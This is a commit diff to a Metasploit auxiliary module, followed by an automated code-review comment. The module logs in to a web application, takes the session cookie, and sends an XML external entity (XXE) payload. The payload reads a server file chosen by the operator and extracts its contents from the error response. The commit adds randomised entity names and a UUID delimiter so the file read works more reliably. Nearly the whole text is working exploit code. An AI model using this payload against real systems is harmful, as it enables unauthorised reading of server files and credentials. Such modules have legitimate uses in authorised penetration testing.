Added error checks, randomness, and uuid delimeter
This commit is contained in:
parent
f3fc4003d0
commit
0490af8ba8
|
@ -50,6 +50,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def run
|
||||
|
||||
print_status("Logging in to grab a valid session cookie")
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'j_spring_security_check'),
|
||||
|
@ -60,6 +61,12 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
})
|
||||
|
||||
if res.nil?
|
||||
fail_with("No response from POST request")
|
||||
elsif res.code != 302
|
||||
fail_with("Non-302 response from POST request")
|
||||
end
|
||||
|
||||
unless res.headers["Location"].include? "index.jsp"
|
||||
fail_with(Failure::Unknown, 'Authentication failed')
|
||||
end
|
||||
|
@ -68,7 +75,16 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
print_status("Got cookie, going for the goods")
|
||||
|
||||
xxe = '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file://'+datastore["FILEPATH"]+'" >]><foo>&xxe;</foo>'
|
||||
rand_doctype= Rex::Text.rand_text_alpha(rand(1..10))
|
||||
rand_entity1 = Rex::Text.rand_text_alpha(rand(1..10))
|
||||
rand_entity2 = Rex::Text.rand_text_alpha(rand(1..10))
|
||||
delimiter = SecureRandom.uuid
|
||||
|
||||
xxe = %Q^<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||
<!DOCTYPE #{rand_doctype} [
|
||||
<!ELEMENT #{rand_entity1} ANY >
|
||||
<!ENTITY #{rand_entity2} SYSTEM "file://#{datastore["FILEPATH"]}" >
|
||||
]><#{rand_entity1}>#{delimiter}&#{rand_entity2};#{delimiter}</#{rand_entity1}>^
|
||||
|
||||
res = send_request_raw({
|
||||
'method' => 'POST',
|
||||
|
@ -77,15 +93,15 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'cookie' => cookie
|
||||
})
|
||||
|
||||
# extract filepath data from response and remove preceding errors
|
||||
# extract filepath data from response
|
||||
|
||||
if res.body =~ /<title.*\/?>(.+)<\/title\/?>/m
|
||||
title = $1
|
||||
if res and res.code == 400 and res.message =~ /#{delimiter}(.+)#{delimiter}/
|
||||
result = $1
|
||||
print_good("#{result}")
|
||||
else
|
||||
fail_with(Failure::Unknown, 'Error fetching file, try another')
|
||||
end
|
||||
|
||||
result = title.match(/"(.*)/m)
|
||||
|
||||
print_good("#{result}")
|
||||
|
||||
end
|
||||
end
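Review bot: The two new `fail_with` calls in the second hunk's error-check block, `fail_with("No response from POST request")` and `fail_with("Non-302 response from POST request")`, pass only a message, while the call two lines below them and the one in the last hunk pass a `Failure::*` reason first (`fail_with(Failure::Unknown, 'Authentication failed')`). With a single argument the free-form string presumably lands in the reason slot and the message is left empty, so the failure is not filed under a known category; `fail_with(Failure::Unreachable, 'No response from POST request')` and `fail_with(Failure::UnexpectedReply, 'Non-302 response from POST request')` keep the module consistent with its other calls. In the last hunk the new condition `if res and res.code == 400 and res.message =~ /#{delimiter}(.+)#{delimiter}/` uses `and` and then reads `$1`; `&&` and `Regexp.last_match(1)` avoid the precedence and magic-global traps, and wrapping the interpolations in `Regexp.escape(delimiter)` makes the intent explicit even though a UUID carries no regex metacharacters. `run` spans all four hunks, so its body continues between them.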
|
||||
|
||||
|
|